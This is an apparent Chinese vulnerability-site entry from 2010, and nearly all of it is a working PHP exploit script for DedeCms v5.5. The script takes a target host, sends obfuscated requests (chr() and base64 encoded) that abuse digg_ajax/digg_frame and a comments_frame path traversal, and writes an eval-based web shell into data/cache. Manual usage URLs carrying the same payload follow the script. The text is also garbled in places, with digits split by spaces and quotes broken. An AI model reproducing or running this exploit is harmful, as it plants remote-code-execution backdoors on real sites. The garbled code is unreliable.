DedeCms v5. 5 vulnerability-vulnerability warning-the black bar safety net

2010-03-22T00:00:00
ID MYHACK58:62201026513
Type myhack58
Reporter 佚名
Modified 2010-03-22T00:00:00

Description

<? php print_r(' +----------------------------------------+ dedecms v5. 5 final getwebshell exploit +----------------------------------------+ '); if ($argc < 3) { print_r(' +----------------------------------------+ Usage: php '.$ argv[0].' host path host: target server (ip/hostname) path: path to dedecms Example: php '.$ argv[0].' localhost /dedecms/ +----------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0);

$host = $argv[1]; $path = $argv[2];

$post_a = 'plus/digg_ajax. php? id=1024e1024&/fputs(fopen(chr(4 6). chr(4 6). chr(4 7). chr(1 0 0). chr(9 7). chr(1 1 6). chr(9 7). chr(4 7). chr(9 9). chr(9 7). chr(9 9). chr(1 0 4). chr(1 0 1). chr(4 7). chr(1 1 6). chr(4 6). chr(1 1 2). chr(1 0 4). chr(1 1 2),chr(1 1 9). chr(4 3)),chr(6 0). chr(6 3). chr(1 1 2). chr(1 0 4). chr(1 1 2). chr(3 2). chr(1 0 1). chr(1 1 8). chr(9 7). chr(1 0 8). chr(4 0). chr(3 6). chr(9 5). chr(8 0). chr(7 9). chr(8 3). chr(8 4). chr(9 1). chr(3 9). chr(1 1 6). chr(3 9). chr(9 3). chr(4 1). chr(5 9). chr(6 3). chr(6 2));/'; $post_b = 'needCode=aa/../../../data/mysql_error_trace'; $shell = 'data/cache/t.php';

get_send($post_a); post_send('plus/comments_frame.php',$post_b); $content = post_send($shell,'t=echo tojen;');

if(substr($content,9,3)=='2 0 0'){ echo "\nShell Address is:".$ host.$ path.$ shell; }else{ echo "\nError."; } function get_send($url){ global $host, $path; $message = "GET ".$ path."$ url HTTP/1.1\r\n"; $message .= "Accept: /\r\n"; $message .= "Referer: http://$host$path\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Connection: Close\r\n\r\n"; $fp = fsockopen($host, 8 0); if(!$ fp){ echo "\nConnect to host Error"; } fputs($fp, $message);

$back = ";

while (! feof($fp)) $back .= fread($fp, 1 0 2 4); fclose($fp); return $back;

} function post_send($url,$cmd){

global $host, $path; $message = "POST ".$ path."$ url HTTP/1.1\r\n"; $message .= "Accept: /\r\n"; $message .= "Referer: http://$host$path\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ". strlen($cmd)."\ r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; $fp = fsockopen($host, 8 0); if(!$ fp){ echo "\nConnect to host Error"; } fputs($fp, $message);

$back = ";

while (! feof($fp)) $back .= fread($fp, 1 0 2 4); fclose($fp); return $back; } ?& gt;

Using the method Copy the code http://xxx.com//uploads/plus/digg_frame.php?action=good&id=1 0 2 4% 6 5 1 0 2 4&mid=*/fputs(fopen(base64_decode(ZGF0YS9jYWNoZS9jLnBocA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgpz4));?& gt;

Copy the code http://xxx.com/uploads/plus/comments_frame.php?id=2&needCode=/../../../data/mysql_error_trace

在 data/cache 下 生成 c.php